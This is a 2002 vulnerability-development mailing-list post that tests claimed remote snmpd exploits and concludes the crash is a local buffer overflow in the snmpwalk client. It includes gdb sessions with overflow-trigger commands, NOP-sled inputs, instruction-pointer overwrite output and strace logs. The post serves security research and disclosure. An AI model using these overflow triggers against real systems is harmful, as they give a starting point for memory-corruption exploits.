Vulnerability Development mailing list archives
snmpd exploit examination - snmpwalk
From: KF <dotslash () snosoft com>
Date: Wed, 20 Feb 2002 16:14:50 -0500
I am not so sure about those proof of concept remote snmp exploits that were posted... they look more like local exploits to me. [root@linuxppc root]# ps -ef | grep snmp root 6355 1 17 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null (gdb) r 127.0.0.1 public `perl -e 'print "A" x 293'` Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'` Program received signal SIGSEGV, Segmentation fault. 0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so (gdb) bt #0 0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so #1 0x0ff99358 in snmp_parse_oid () from /usr/lib/libsnmp-0.4.2.1.so #2 0x10000e28 in _init () #3 0x0fc6eb90 in __libc_start_main () from /lib/libc.so.6 (gdb) r 127.0.0.1 public `perl -e 'print "A" x 308'` Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 308'` Program received signal SIGILL, Illegal instruction. 0x41414100 in ?? () (gdb) r 127.0.0.1 public `perl -e 'print "A" x 309'` Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'` Program received signal SIGILL, Illegal instruction. 0x41414140 in ?? () This is snmpwalk NOT snmpd dying... [root@linuxppc root]# ps -ef | grep snmp root 6355 1 5 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null Still running... Ok lets use a newer version of snmpwalk [root@linuxppc ucd-snmp-4.2.2]# apps/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: Unknown Object Identifier (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) [root@linuxppc root]# ps -ef | grep snmp root 6355 1 4 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null still running... These are the examples I have seen in various emails as methods to exploit snmpd...These seem to do nothing on my box to the client or the daemon... snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'` execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL); execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL); Here are my results. [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c `perl -e 'print "A" x 256'` Timeout: No Response from 127.0.0.1 [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 450'` Timeout: No Response from 127.0.0.1 [root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 `perl -e 'print "A" x 4050'` Timeout: No Response from 127.0.0.1 Addtional findings. [root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 public `perl -e 'print "A" x 4050'` Segmentation fault [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c public `perl -e 'print "A" x 4050'` Segmentation fault Mean while the daemon reads the requests with no problems... [0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1 [0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494 [0fc142b4] gettimeofday({1014238429, 731763}, NULL) = 0 [0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1 [0fc5211c] recvfrom(4, "0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494 [0fc142b4] gettimeofday({1014238430, 739274}, NULL) = 0 [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 3999'` Timeout: No Response from 127.0.0.1 [0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037 [0fc142b4] gettimeofday({1014238568, 885323}, NULL) = 0 [0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1 [0fc5211c] recvfrom(4, "0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0, {sin_family=AF_INET, sin_port=htons(32795), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037 Give it too many chars and snmpwalk complains. [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'` snmpwalk: Error building ASN.1 representation Again YOUR results may vary ... these are mine. -KF
Current thread:
- snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk Syzop (Feb 21)
- Message not available
- Re: snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk xbud (Feb 21)
- <Possible follow-ups>
- Re: snmpd exploit examination - snmpwalk The Itch (Feb 21)